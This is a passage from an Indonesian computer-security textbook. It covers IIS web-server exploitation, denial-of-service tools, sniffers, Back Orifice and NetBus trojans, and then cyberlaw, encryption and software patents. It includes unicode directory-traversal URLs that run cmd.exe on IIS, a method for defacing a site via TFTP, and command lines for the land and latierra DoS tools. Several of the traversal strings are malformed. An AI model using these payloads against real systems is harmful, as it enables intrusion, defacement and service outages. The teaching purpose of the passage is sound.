keamanan cyber 4
query yang sedikit (berdasarkan jumlah dan ukuran paket yang
dikirimkan) dia menghasilkan jawaban yang cukup panjang. Dengan kata
lain terjadi amplifikasi dari penakai an bandwidth jaringan. Periksa sistem
anda apakah DNS anda sudah dikelola dengan baik atau masih terbuka
untuk zone transfer.
Sam Spade, utility untuk MS Windows
Untuk anda yang memakai sistem yang berbasis Microsoft Windows,
anda dapat memakai program Sam Spade. Program ini dapat diperoleh
secara gratis dari web http://www.samspade.org. Gambar berikut
menunjukkan sebuah sesi Sam Spade untuk mencari informasi tentang
domain INDOCISC.com.
Cari informasi tentang nama-nama dari name server
(NS) domain anda atau domain perusahaan anda. Informasi
apa saja yang dapat anda peroleh dari data-data DNS
tersebut? Nomor IP apa saja yang dapat anda peroleh dari
data-data DNS tersebut?
Informasi DNS memang tersedia untuk umum. Akan tetapi seharusnya
informasi yang komplit hanya boleh dilihat oleh server tertentu. Istilahnya,
“zone transfer” hanya diperbolehkan untuk server tertentu saja.
Web server menyediakan jasa untuk publik. Dengan demikian dia harus
berada di depan publik. Sayangnya banyak lubang keamanan dalam
implementasi beberapa web server. Di bagian ini akan dicontohkan
beberapa eksploitasi tersebut.
Defacing Microsoft IIS
Salah satu lubang keamanan dari web yang berbasis IIS yaitu adanya
program atau script yang kurang baik implementasinya. Sebagai contoh,
bugtraq id 1806 menujukkan cara untuk melihat isi direktori dari sebuah
web server yang berbasis IIS. (Informasi lengkapnya ada di http://
www.securityfocus.com/bid/1806).
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/
c+dir
http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/
c+dir
http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/
c+dir
http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/
c+dir
http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/
c+dir
http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/
c+dir
http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/
c+dir
Perintah di atas menjalankan perintah “dir” untuk melihat direktori di server
IIS tersebut. Selain melihat direktori dengan perintah “dir”, anda dapat juga
menjalankan perintah lain di server tersebut, seperti misalnya meng-copy
file. Salah satu exploit yaitu dengan mengambil file dari sebuah tempat
dengan “TFTP” ke server IIS tersebut. Prinsipnya yaitu memakai
perintah yang command line sebagai perintah “dir” tersebut, seperti dnegan
printah “tftp” dan menggantikan spasi dengan tanda tambah (+). Setelah itu,
file dapat ditempatkan dimana saja termasuk di direktori yang dipakai
untuk memberikan layanan web. Atau dengan kata lain web tersebut dapat
diubah (deface).
Denial of Service Attack
“Denial of Service (DoS) attack” merupakan sebuah usaha (dalam bentuk
serangan) untuk melumpuhkan sistem yang dijadikan target sehingga sistem
tersebut tidak dapat menyediakan servis-servisnya (denial of service) atau
tingkat servis menurun dengan drastis. Cara untuk melumpuhkan dapat
bermacam-macam dan akibatnyapun dapat beragam. Sistem yang diserang
dapat menjadi “bengong” (hang, crash), tidak berfungsi, atau turun
kinerjanya (beban CPU tinggi).
Serangan denial of service berbeda dengan kejahatan pencurian data atau
kejahatan memonitor informasi yang lalu lalang. Dalam serangan DoS tidak
ada yang dicuri. Akan tetapi, serangan DoS dapat mengakibatkan kerugian
finansial. Sebagai contoh apabila sistem yang diserang merupakan server
yang menangani transaksi “commerce”, maka apabila server tersebut tidak
berfungsi, transaksi tidak dapat dilangsungkan. Bayangkan apabila sebuah
bank diserang oleh bank saingan dengan melumpuhkan outlet ATM
(Anjungan Tunai Mandiri, Automatic Teller Machine) yang dimiliki oleh
bank tersebut. Atau sebuah credit card merchant server yang diserang
sehingga tidak dapat menerima pembayaran melalui credit card.
Selain itu, serangan DoS sering dipakai sebagai bagian dari serangan
lainnya. Misalnya, dalam serangan IPspoofing (seolah serangan datang dari
tempat lain dengan nomor IP milik orang lain), seringkali DoS dipakai
untuk membungkam server yang akan dispoof.
Land attack
Land attack merupakan serangan kepada sistem dengan memakai
program yang bernama “land”. Apabila serangan diarahkan kepada sistem
Windows 95, maka sistem yang tidak diproteksi akan menjadi hang (dan
bisa keluar layar biru). Demikian pula apabila serangan diarahkan ke
beberapa jenis UNIX versi lama, maka sistem akan hang. Jika serangan
diarahkan ke sistem Windows NT, maka sistem akan sibuk dengan
penakai an CPU mencapai 100% untuk beberapa saat sehingga sistem
terlihat seperti macet. Dapat dibayangkan apabila hal ini dilakukan secara
berulang-ulang. Serangan land ini membutuhkan nomor IP dan nomor port
dari server yang dituju. Untuk sistem Windows, biasanya port 139 yang
dipakai untuk menyerang.
Program land menyerang server yang dituju dengan mengirimkan packet
palsu yang seolah-olah berasal dari server yang dituju. Dengan kata lain,
source dan destination dari packet dibuat seakan-akan berasal dari server
yang dituju. Akibatnya server yang diserang menjadi bingung.
unix# ./land 192.168.1.1 139
land.c by m3lt, FLC
192.168.1.1:139 landed
Latierra
Program latierra merupakan “perbaikan” dari program land, dimana port
yang dipakai berubah-ubah sehingga menyulitkan bagi pengamanan.
latierra v1.0b by MondoMan (elmondo@usa.net), KeG
Enhanced version of land.c originally developed by m3lt, FLC
Arguments:
* -i dest_ip = destination ip address such as 1.1.1.1
If last octet is '-', then the address will increment
from 1 to 254 (Class C) on the next loop
and loop must be > 1 or -5 (forever).
Alternatives = zone=filename.txt or list=filename.txt
(ASCII) For list of alternative options,
use -a instead of -h.
* -b port# = beginning port number (required).
-e port# = ending port number (optional)
-t = tcp flag options (f=fin, ~s=syn, r=reset, ~p=push, a=ack,
u=urgent)
-v = time_to_live value, default=255
-p protocol = ~6=tcp, 17=udp, use -p option for complete list
-w window_size = value from 0 to ?, default=65000
-q tcp_sequence_number, default=3868
-m message_type
(~0=none, 1=Out-Of-Band, 4=Msg_DontRoute
-s seconds = delay between port numbers, default=1
-o 1 = supress additional output to screen, default=0
-l loop = times to loop through ports/scan, default=1,
-5=forever
* = required ~ = default parameter values
unix# ./latierra -i 192.167.1.1 -b 139 -e 141
latierra v1.0b by MondoMan (elmondo@usa.net), KeG
Enhanced version of land.c originally developed by m3lt, FLC
Settings:
(-i) Dest. IP Addr : 192.168.1.1
(-b) Beginning Port #: 139
(-e) Ending Port # : 141
(-s) Seconds to Pause: 1
(-l) Loop : 1
(-w) Window size : 65000
(-q) Sequence Number : F1C (3868)
(-v) Time-to-Live : 255
(-p) IP Protocol # : 6
(-t) TCP flags : syn push
Done.
Ping-o-death
Ping-o-death sebetulnya yaitu eksploitasi program ping dengan
memberikan packet yang ukurannya besar ke sistem yang dituju. Beberapa
sistem UNIX ternyata menjadi hang ketika diserang dengan cara ini.
Program ping umum terdapat di berbagai operating system, meskipun
umumnya program ping tersebut mengirimkan packet dengan ukuran kecil
(tertentu) dan tidak memiliki fasilitas untuk mengubah besarnya packet.
Salah satu implementasi program ping yang dapat dipakai untuk
mengubah ukuran packet yaitu program ping yang ada di sistem Windows
95.
Ping broadcast (smurf)
Salah satu mekanisme serangan yang baru-baru ini mulai marak dipakai
yaitu memakai ping ke alamat broadcast, ini yang sering disebut
dengan smurf. Seluruh komputer (device) yang berada di alamat broadcast
tersebut akan menjawab. Apakah ini merupakan standar?
Jika sebuah sistem memiliki banyak komputer (device) dan ping broadcast
ini dilakukan terus menerus, jaringan dapat dipenuhi oleh respon-respon
dari device-device tersebut. Akibatnya jaringan menjadi lambat.
$ ping 192.168.1.255
PING 192.168.1.255 (192.168.1.255): 56 data bytes
64 bytes from 192.168.1.4: icmp_seq=0 ttl=64 time=2.6 ms
64 bytes from 192.168.1.2: icmp_seq=0 ttl=255 time=24.0 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=1 ttl=255 time=4.7 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=2 ttl=255 time=4.7 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=3 ttl=255 time=4.7 ms
(DUP!)
--- 192.168.1.255 ping statistics ---
4 packets transmitted, 4 packets received, +4 duplicates, 0%
packet loss
round-trip min/avg/max = 2.5/6.0/24.0 ms
Smurf attack biasanya dilakukan dengan memakai IP spoofing, yaitu
mengubah nomor IP dari datangnya request, tidak seperti contoh di atas.
Dengan memakai IP spoofing, respon dari ping tadi dialamatkan ke
komputer yang IPnya dispoof. Akibatnya komputer tersebut akan menerima
banyak paket. Hal ini dapat mengakibatkan pemborosan penakai an
(bandwidth) jaringan yang menghubungkan komputer tersebut. Dapat
dibayangkan apabila komputer yang dispoof tersebut memiliki hubungan
yang berkecepatan rendah dan ping diarahkan ke sistem yang memiliki
banyak host. Hal ini dapat mengakibatkan DoS attack.
Contoh-contoh DoS attack lainnya
• Program “ping.exe” di sistem Windows (dicobakan pada Windows NT 4
Service Pack 4) dapat dipakai untuk menghentikan beberapa aplikasi
sistem Windows jika diberikan nama host yang panjangnya lebih dari
112 karakter. Aplikasi dialup akan mati. Eksploitasi ini membutuhkan
user di local server.
http://www.securitytracker.com/alerts/2001/Apr/1001255.htm
• A vulnerability has been reported in the version of Telnet that is shipped
with most Microsoft systems that allows a local user to crash several
applications, including OutlookExpress.
It is reported that, if you fill up the "Host Name" buffer (Connect/Remote
System/Host Name) with the maximum of 256 chars and press "Connect" (tested with 256 "A" characters), the application will crash but will
not close down, instead, it will display a "Connection Failed!" message.
http://www.securitytracker.com/alerts/2001/Mar/1001209.html
Sniffer
Program sniffer yaitu program yang dapat dipakai untuk menyadap
data dan informasi melalui jaringan komputer. Di tangan seorang admin,
program sniffer sangat bermanfaat untuk mencari (debug) kesalahan di
jaringan atau untuk memantau adanya serangan. Di tangan cracker, program
sniffer dapat dipakai untuk menyadap password (jika dikirimkan dalam
bentuk clear text).
Sniffit
Program sniffit dijalankan dengan userid root (atau program dapat di-setuid
root sehingga dapat dijalankan oleh siapa saja) dan dapat menyadap data.
Untuk contoh penakai an sniffit, silahkan baca dokumentasi yang
menyertainya. (Versi berikut dari buku ini akan menyediakan informasi
tentang penakai annya.)
tcpdump
Program tcpdump merupakan program gratis yang umum dipakai untuk
menangkap paket di sistem UNIX. Implementasi untuk sistem Window juga
tersedia dengan nama windump. Setelah ditangkap, data-data (paket) ini
dapat diolah dengan program lainnya, seperti dengan memakai
program tcpshow, tcptrace, dan sejenisnya.
Program tcpdump sangat powerful dan dipakai sebagai basis dari
pembahasan di beberapa buku, seperti buku seri “TCP/IP Illustrated” dari
Richard Stevens [46] yang sangat terkenal atau buku “Network Intrusion
Detection” [31]. Berikut ini yaitu contoh sebuah sesi tcpdump.
unix# tcpdump
06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: S
616175183:616175183(0) win 5840 <mss 1460,nop,nop,sackOK> (DF)
06:46:31.318893 192.168.1.1.80 > 192.168.1.7.1043: S
1312015909:1312015909(0) ack 616175184 win 32736 <mss 1460>
06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: . ack 1 win
5840 (DF)
06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: P
1:296(295) ack 1 win 5840 (DF)
06:46:31.338893 192.168.1.1.80 > 192.168.1.7.1043: . ack 296
win 32441 (DF)
06:46:31.738893 192.168.1.1.80 > 192.168.1.7.1043: P
1:200(199) ack 296 win 32736 (DF)
06:46:31.868893 192.168.1.7.1043 > 192.168.1.1.80: . ack 200
win 5641 (DF)
06:46:31.898893 192.168.1.1.1492 > 192.168.1.7.113: S
2035772989:2035772989(0) win 512 <mss 1460>
06:46:31.898893 192.168.1.7.113 > 192.168.1.1.1492: R 0:0(0)
ack 2035772990 win 0
06:46:39.028893 192.168.1.7 > 192.168.1.1: icmp: echo request
06:46:39.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply
06:46:40.028893 192.168.1.7 > 192.168.1.1: icmp: echo request
06:46:40.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply
06:46:41.028893 192.168.1.7 > 192.168.1.1: icmp: echo request
06:46:41.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply
06:46:42.038893 192.168.1.7 > 192.168.1.1: icmp: echo request
06:46:42.038893 192.168.1.1 > 192.168.1.7: icmp: echo reply
06:46:44.048893 192.168.1.7.1043 > 192.168.1.1.80: P
296:591(295) ack 200 win 5641 (DF)
06:46:44.048893 192.168.1.1.80 > 192.168.1.7.1043: P
200:398(198) ack 591 win 32736 (DF)
06:46:44.168893 192.168.1.7.1043 > 192.168.1.1.80: . ack 398
win 5443 (DF)
Dalam contoh di atas, pada baris-baris pertama, ditunjukkan sebuah sesi
web browsing (lihat port 80 yang dipakai sebagai target port) dari sebuah
komputer dengan nomor IP 192.168.1.7 ke server web dengan nomor IP
192.168.1.1. Di sesi itu nampak three way handshaking (paket SYN, dibalas
dengan SYN/ACK, dan dibalas dengan ACK). Untuk mengetahui lebih
lengkap tentang paket-paket ini, silahkan baca buku “TCP/IP Illustrated”
dari Richard Stevens atau buku “Network Intrusion Detection” (Stephen
Northcutt & Judy Novak).
Selain sesi web, nampak juga sesi ping dimana ada paket “ICMP echo
request” yang dibalas dengan paket “ICMP echo reply”. Ping ini juga
dikirimkan dari IP 192.168.1.7 ke komputer dengan IP 192.168.1.1.
Sniffer Pro
Sniffer Pro merupakan program sniffer komersial yang berjalan di sistem
Windows. Program ini dibuat oleh Network Associates dan cukup lengkap
fasilitasnya. Sniffer Pro dapat menangkap packet dengan aturan-aturan
(rules) tertentu. Bahkan dia dilengkapi dengan visualisasi yang sangat
menarik dan membantu administrator.
Anti Sniffer
Untuk menutup lubang keamanan dari kegiatan sniffing, administrator
dapat membuat jaringannya bersegmen dan memakai perangkat switch
sebagai pengganti hub biasa. Selain itu dapat juga dipakai program untuk
mendeteksi adanya penakai an sniffer di jaringan yang dikelolanya.
Program pendeteksi sniffer ini disebut anti-sniffer.
Program anti-sniffer bekerja dengan mengirimkan packet palsu ke dalam
jaringan dan mendeteksi responnya. Ethernetcard yang diset ke dalam
promiscuous mode (yang umumnya dipakai ketika melakukan sniffing)
dan program yang dipakai untuk menyadap sering memberikan jawaban
atas packet palsu ini. Dengan adanya jawaban tersebut dapat diketahui
bahwa ada yang melakukan kegiatan sniffing.
Trojan Horse
Trojan horse di sistem komputer yaitu program yang disisipkan tanpa
pengetahuan si pemilik komputer. Trojan horse ini kemudian dapat
diaktifkan dan dikendalikan dari jarak jauh, atau dengan memakai
timer (pewaktu). Akibatnya, komputer yang disisipi trojan horse tersebut
dapat dikendalikan dari jarak jauh.
Ada yang mengatakan bahwa sebetulnya program ini mirip remote
administration. Memang sifat dan fungsinya sama. Remote administration /
access program seperti pcAnywhere dipakai untuk keperluan yang benar
(legitimate). Sementara trojan horse biasanya dipakai untuk keperluan
yang negatif.
Back Orifice (BO)
Back Orifice (BO) merupakan trojan horse untuk sistem yang memakai
operating system Windows (95, 98, NT, 2000). BO Merupakan produk dari
Cult of the Dead Cow, pertama kali dikeluarkan 3 Agustus 1998 dan sangat
populer di kalangan bawah tanah. Pada saat dokumen ini ditulis, telah
keluar BO 2000 untuk sistem operasi Windows 2000.
BO terdiri dari server (yang dipasang atau disisipkan di komputer target)
dan client (yang dipakai untuk mengendalikan server). Akses ke server
BO dapat diproteksi dengan memakai password sehingga
mengecohkan atau membatasi akses oleh orang lain.
Dengan memakai BO, intruder dapat mengirimkan pesan seperti:
Mengirim pesan mungkin tidak terlalu bermasalah, meskipun menggangu.
Bayangkan jika intruder tersebut memformat harddisk anda atau
menangkan keystroke anda (apalagi kalau anda menuliskan userid dan
password).
Server BO memakai TCP/IP dan menunggu di port 31337. Jika di
komputer anda port tersebut terbuka, ada kemungkinan BO sudah terpasang
di sana. Namun, nomor port dari BO dapat dipindahkan ke nomor port lain
sehingga mengelabui administrator.
Mendeteksi BO
Gunakan program "REGEDIT" dan cari
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
RunServices
Jika variabel tersebut berisi, maka anda sudah terkena BO. Catatan: nama
file yaitu space-dot-exe. Cek di direktory "Windows\SYSTEM\" jika ada
nama file yang kosong atau titik, dan ukurannya (sama dengan atau lebih
besar dari) 122KB, kemungkinan itu BO. File tersebut tidak dapat dihapus
begitu saja.
Sumber informasi tentang BO dapat diperoleh dari
• http://www.nwi.net/~pchelp/bo/bo.html
• http://www.bo2k.com
• http://www.iss.net/xforce/alerts/advise5.html
NetBus
NetBus merupakan trojan horse yang mirip Back Orifice. NetBus dapat
dipakai untuk mengelola komputer Windows 95/98/NT dari jarak jauh
untuk mengakses data dan fungsi dari komputer tersebut. NetBus terdiri
dari client dan server. Versi 1.60 dari NetBus server yaitu Windows PE file
yang bernama PATCH.EXE. Jika dia terpasang (installed) maka dia akan
langsung dijalankan ketika komputer di"StartUp".
Eksekusi dari server ada di
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Run
Porsi dari server NetBus cukup canggih dimana dia menghilangkan
jejaknya dari daftar proses yang jalan, dan tidak memperbolehkan dirinya
dihapus atau di"rename". Jika server tersebut dijalankan dengan
memakai "/remove", maka dia akan menghilangkan diri (remove) dari
sistem itu. Porsi client dipakai untuk mengendalikan komputer yang
sudah terpasang NetBus. Komunikasi dilakukan dengan memakai
TCP/IP. Client dapat melakukan port scanning untuk mencari dimana server
berada. NetBus dapat mengirimkan "keystroke" seolah-olah user yang
mengetikkannya di depan layar, dan juga dapat menangkap "keystroke"
serta menyimpannya dalam sebuah berkas.
Pengamanan terhadap serangan NetBus dapat dilakukan dengan
memakai program Busjacker dan F-Secure. Informasi mengenai
NetBus dapat diperoleh di http://www.netbus.org.
Masalah keamanan erat hubungannya dengan masalah hukum. Terminologi
cyberlaw mulai banyak terdengar. Dalam bab ini akan diulas beberapa
aspek keamanan yang berhubungan dengan masalah hukum.
[Bagian ini akan saya perbaiki lagi mengingat sudah banyak informasi
mengenai cyberlaw di Indonesia. Saya sendiri ikut terlibat dalam
penyusunan cyberlaw ini.]
Internet menghilangkan batas tempat dan waktu, dua asas yang cukup
esensial di bidang hukum. Dimanakah batas teritori dari cyberlaw? Untuk
siapakah cyberlaw dibuat? Biasanya hukum menyangkut citizen dari
yuridiksi hukum tersebut. Cyberlaw biasanya terkait dengan Netizen. Untuk
Indonesia, siapakah netizen Indonesia?
Terhubungnya sebuah sistem informasi dengan Internet membuka peluang
adanya kejahatan melalui jaringan komputer. Hal ini menimbulkan
tantangan bagi penegak hukum. Hukum dari sebagian besar negara di dunia
belum menjangkau daerah cyberspace. Saat ini hampir semua negara di
dunia berlomba-lomba untuk menyiapkan landasan hukum bagi Internet.
Tentunya banyak hal yang dapat dibahas, akan tetapi dalam buku ini hanya
dibahas hal-hal yang berkaitan dengan masalah keamanan (security),
masalah lain seperti pajak (hal-hal yang berhubungan dengan perbankan
dan bisnis), trademark, HaKI (Intellectual Property Rights atau IPR), dan
yang tidak langsung terkait dengan masalah keamanan tidak dibahas di
dalam buku ini.
Dalam aplikasi e-commerce, misalnya, ada masalah yang berkaitan dengan
hukum yaitu masalah privacy dan penakai an teknologi kriptografi (seperti
penakai an enkripsi). Setiap negara memiliki hukum yang berlainan.
Misalnya negara Amerika Serikat melarang ekspor teknologi enkripsi.
Demikian pula pengamanan data-data yang berhubungan dengan bidang
kesehatan sangat diperhatikan. Selain itu sistem perbankan setiap negara
memiliki hukum yang berlainan. Hal-hal inilah yang menyulitkan
commerce yang melewati batas fisik negara.
Penegakan hukum (law enforcement) merupakan masalah tersendiri. Ambil
contoh seseorang yang tertangkap basah melakukan cracking yang
mengakibatkan kerugian finansial. Hukuman apa yang dapat diberikan?
Sebagai contoh, di Cina terjadi hukuman mati atas dua orang crackers yang
tertangkap mencuri uang sebesar US$31.400 dari sebuah bank di Cina
bagian Timur. Berita lengkapnya dapat dibaca di:
• http://www.news.com/News/Item/0,4,30332,00.html
• http://cnn.com/WORLD/asiapcf/9812/28/BC-CHINA-HACKERS.reut/
index.html
• http://slashdot.org/articles/98/12/28/096231.shtml
Bagaimana dengan di Indonesia?
Hukum di Luar Negeri
Beberapa hukum yang terkait dengan masalah komputer, jaringan
komputer, dan sistem informasi di luar negeri antara lain:
• Di Amerika Serikat ada “Computer Fraud and Abuse Act” (1984) dan
kemudian diperbaiki di tahun 1994.
• Di Inggris ada “Computer Misuse Act of 1990”.
Bagian ini masih harus ditambahkan lebih banyak lagi.
penakai an Enkripsi dan Teknologi
Kriptografi Secara Umum
Salah satu cara untuk mengamankan data dan informasi yaitu dengan
memakai teknologi kriptografi (cryptography). Misalnya data dapat
dienkripsi dengan memakai metoda tertentu sehingga hanya dapat
dibaca oleh orang tertentu. Ada beberapa masalah dalam penakai an
teknologi kriptografi ini, antara lain:
• Dilarangnya ekspor teknologi kriptografi dari Amerika Serikat (USA),
padahal teknologi yang canggih ini banyak dikembangkan di Amerika
Serikat. Alasan pelarangan ini disebabkan ketakutan pemerintah
Amerika Serikat tidak dapat membaca (menyadap) komunikasi mafia,
teroris, dan musuh negara Amerika. Itulah sebabnya produk teknologi
kriptografi dianggap sebagai munition, yang dibatasi penjualan ke luar
negerinya. Adanya larangan ini membuat interoperability antar produk
yang memakai teknologi kriptografi menjadi lebih sulit.
Hal yang lain yaitu selain negara Amerika, negara lain mendapat
produk dengan kualitas keamanan yang lebih rendah. Sebagai contoh,
Web browser Netscape dilengkapi dengan fasilitas security dengan
memakai sistem RSA. Pada saat buku ini ditulis, implementasi RSA
dengan memakai 128 bit hanya dapat dipakai di dalam negeri
Amerika saja (tidak boleh diekspor). Untuk itu Netscape harus membuat
versi Internasional yang hanya memakai 56 bit dan boleh diekspor.
Tingkat keamanan sistem yang memakai 56 bit jauh lebih rendah
dibandingkan dengan sistem yang memakai 128 bit. Contoh lain
yaitu mekanisme authentication (MSCHAP) produk Microsoft
Windows NT 4.0 memakai enkripsi 40-bit untuk versi internasional
dan 128-bit untuk produk US-only. Saat ini, 40-bit dianggap kurang
cukup untuk melindungi kerahasiaan data. Akibatnya banyak orang yang
membeli produk security dari negara lain, bukan dari Amerika Serikat.
(Hal ini sebenarnya merugikan perusahaan di Amerika Serikat.)
• Bagi sebuah negara, ketergantungan masalah keamanan kepada negara
lain merupakan suatu aspek yang cukup sensitif. Kemampuan negara
dalam mengusai teknologi merupakan suatu hal yang esensial.
Bagaimana jika kedua negara berperang?
• Ketergantungan kepada negara lain ini juga sangat penting dilihat dari
sudut bisnis karena misalnya jika electronic commerce memakai
produk yang harus dilisensi dari negara lain maka banyak devisa negara
yang akan tersedot hanya untuk melisensi teknologi tersebut.
• Algoritma-algoritma yang sangat baik untuk kriptografi umumnya
dipatenkan. Hal ini seringkali mempersulit implementasi sebuah produk
tanpa melanggar hak patent. Selain itu setiap negara di dunia memiliki
pandangan tertentu terhadap hak patent. Sebagi contoh, algoritma RSA
dipatenkan di Amerika Serikat akan tetapi tidak diakui di Jepang (lihat
cerita latar belakangnya di [17]).
Pemerintah negara tertentu berusaha untuk memakai peraturan
(regulation) untuk mengatur penakai an teknologi enkripsi. Hal ini
ditentang dan diragukan oleh banyak pihak. Dalam sebuah survey [22],
82% responden menyatakan bahwa pemerintah tidak dapat mengatur secara
efektif penyebaran penakai an teknologi enkripsi melalui regulasi.
Digital Evidence - Barang Bukti Digital
Salah satu persoalan yang ditimbulkan oleh teknologi digital yaitu
kemudahan untuk mengubah data. Sebuah dokumen elektronik dapat
dengan mudah diubah dengan memakai sebuah wordprocessor
sehingga dokumen tampak seperti sama. Di dunia analog yang
konvensional, jika kita mengubah isi sebuah dokumen (misalnya dengan
menghapus atau menimpanya dengan tulisan lain) maka akan kelihatan
perubahan tersebut. Hal ini menyebabkan orang bingung dengan barang
bukti digital.
Apakah dokumen elektronik bisa dijadikan bukti? Jika kita ambil dokumen
hasil wordprocessor, yang mana yang disebut asli? Dokumen dalam bentuk
kertas yang dicetak? Dokumen yang berada di harddisk? Dokumen yang
berada di CD? Dokumen yang saat ini berada di memory komputer?
Pertanyaan-pertanyaan tersebut di atas ini terjadi karena kita memakai
konsep berpikir konvensional. Pada konsep lama, konsep (dokumen) asli itu
hanya ada satu buah. Sementara itu dalam konsep digital, dokumen asli bisa
lebih dari satu buah. Kesemua dokumen itu asli.
Keaslian sebuah dokumen tidak ditentukan oleh jumlahnya, akan tetapi oleh
keaslian isinya. Dalam dunia digital, hal ini dapat dilakukan dengan
memakai digital signature atau tanda tangan digital. Digital signature
merupakan sebuah konsep untuk memastikan bahwa isi dokumen tidak
berubah. Aspek yang ingin dipertahankan yaitu aspek “non-repudiation”
(tidak dapat menyangkal). Aspek ini dapat dipenuhi dengan adanya digital
signature. Bahkan dengan konsep digital signature, dokumen yang dicetak
(atau bahkan difotocopy atau di-fax-kan) yaitu dokumen yang tidak asli.
Masalah yang berhubungan dengan patent
Enkripsi dengan memakai kunci publik sangat membantu dalam
meningkatkan keamanan informasi. Salah satu algoritma yang cukup
populer dipakai yaitu RSA. Algoritma ini dipatenkan di Amerika
Serikat dengan nomor U.S. Patent 4,405,829 yang dikeluarkan pada tanggal
20 Agustus 1983. Paten yang dimiliki oleh Public Key Partners (PKP,
Sunnyvale, California) ini akan habis di tahun 2000. RSA tidak dipatenkan
di luar daerah Amerika Utara. Bagaimana dengan penakai an algoritma
RSA ini di Indonesia? penakai an enkripsi di luar Amerika ini merupakan
sebuah topik diskusi yang cukup seru.
Secara umum paten di bidang teknologi harus dipertimbangkan dengan
matang. Pasalnya, pada kenyataannya paten lebih banyak berpihak kepada
perusahaan besar. Untuk mendaftarkan paten membutuhkan biaya yang
cukup besar. Jika paten ini dilanggar, pemilik paten yang tidak memiliki
uang harus berjuang keras untuk melawan perusahaan besar yang
melanggar paten tersebut. Hanya perusahaan besar saja yang sanggup
mempertahankan paten.
Paten juga dapat menghambat pengembangan produk. Bayangkan, untuk
membuat sebuah printer dibutuhkan lebih dari 1000 paten. Bagaimana
perusahan kecil di Indonesia bisa berkompetisi dengan perusahaan besar di
luar negeri?
Paten dapat membuat harga produk menjadi lebih mahal. Contoh kasus
yaitu paten obat HIV/AIDS. Penduduk miskin dari Afrika dan India tidak
dapat membeli obat yang mahal harganya. Pada mulanya tidak ada obat
generik untuk penyakit ini karena masalah paten tersebut. Untuk kasus ini,
Pemerintah Afrika Selatan menerapkan “compulsury license” sehingga
perusahaan lokal dapat memproduksi obat tersebut dengan harga yang lebih
terjangkau.
Paten Software
“Computer programs are as abstracts as any algorithm can be.”
(Prof. Donald Knuth)
Salah satu topik yang baru mendapat perhatian yaitu paten software
(software patent). Pada awalnya, software dilindungi dengan copyright.
Namun saat ini Amerika mempelopori penerapan paten untuk software.
Apanya yang dipatenkan dalam software? Algoritmanya.
Masalahnya, algoritma yang dipatenkan mulai “aneh”. Maksudnya hal-hal
yang sederhana dipatenkan sehingga menyulitkan inovasi. Bayangkan,
untuk membuat program sederhana mungkin seorang programmer harus
melisensi berbagai paten. Belum apa-apa sudah ada biaya yang harus
dikeluarkan. Contoh paten yang dapat menghambat inovasi:
• Algoritma Lempel-Ziv (LZW) banyak dipakai untuk compression
gambar. Sebagai contoh, algoritma yang dipakai untuk menyimpan
gambar dalam format GIF memakai algoritma LZW ini. Jadi, ketika
anda membuat sebuah program untuk memperagakan GIF, maka anda
harus membayar royalty kepada pemilik algoritma LZW ini. Saat buku
ini ditulis, Unisys yaitu pemilik paten LZW ini. Itulah sebabnya saat ini
banyak situs web atau program gambar yang memakai format PNG.
• One click e-commerce. Jika anda membuat sebuah situs web yang
melakukan transaksi, misalnya pembeli memilih barang kemudian
memasukkannya dalam “shopping cart”, dan kemudian membayarnya,
maka ada kemungkinan anda melanggar paten (US patent 5,960,411,
“Method and system for placing a purchase order via a communications
network”) yang didaftarkan oleh Amazon ini. Implementasi hal seperti
itu dengan cookie merupakan hal yang sangat mudah (trivial) dan sudah
dilakukan oleh orang banyak.
• Pada tahun 1980-an perusahaan XyQuest membuat produk pengolah
kata dengan nama XyWrite. Produk itu sangat populer pada kurun waktu
itu. Namun pada suatu saat, perusahaan itu harus menarik fitur
“automatic correction and abbreviation expansion” dari produk XyWrite
karena dianggap melanggar paten yang dimiliki oleh perusahaan lain.
Akibatnya penakai software XyWrite tidak dapat memakai fitur
tersebut. Jika anda berpikir untuk memasukkan fitur tersebut dalam
program pengolah kata yang anda buat, siap-siap membayar royalty atau
dituntut.
Di Amerika, meski paten ini berlaku, banyak orang yang tidak setuju. Pakar
komputer Donald Knuth1
bahkan melayangkan surat ke Kantor Paten
Amerika agar paten software ini dicabut karena akan banyak orang Amerika
yang pindah ke luar negeri untuk menghindari paten ini. Thomas Jefferson,
bahkan mengatakan bahwa “ide tidak dapat dipatenkan”.
Di Eropa, saat buku ini ditulis, masih terjadi perdebatan seru akan paten
software ini. Untuk sementara ini, mereka masih tetap menolak penerapan
paten dalam software.
Untuk Indonesia, saya berharap agar paten software tidak terjadi. Regim
copyright sudah cukup untuk software. Jika kita juga ikut menerapkan paten
software, saya khawatir hal ini akan menjadi hambatan tambahan bagi
pengembang software di Indonesia (dan dunia pada umumnya).
Privacy
Aspek privacy sering menjadi masalah yang berkaitan dengan masalah
keamanan. Pemakai (user) umumnya ingin informasi dan kegiatan yang
dilakukannya tidak diketahui oleh orang lain, termasuk oleh administrator.
Sementara itu, demi menjaga keamanan dan tingkat performance dari
sistem yang dikelolanya, seorang administrator seringkali harus mengetahui
apa yang dilakukan oleh pemakai sistemnya.
Sebagai contoh kasus, seorang administrator merasa bahwa salah satu
pemakainya mendapat serangan mailbomb dari orang lain dengan
mengamati jumlah dan ukuran email yang diterima sang pemakai. Adanya
serangan mailbomb ini dapat menurunkan performance sistem yang
dikelolanya, bahkan bisa jadi server yang dipakai bisa menjadi macet
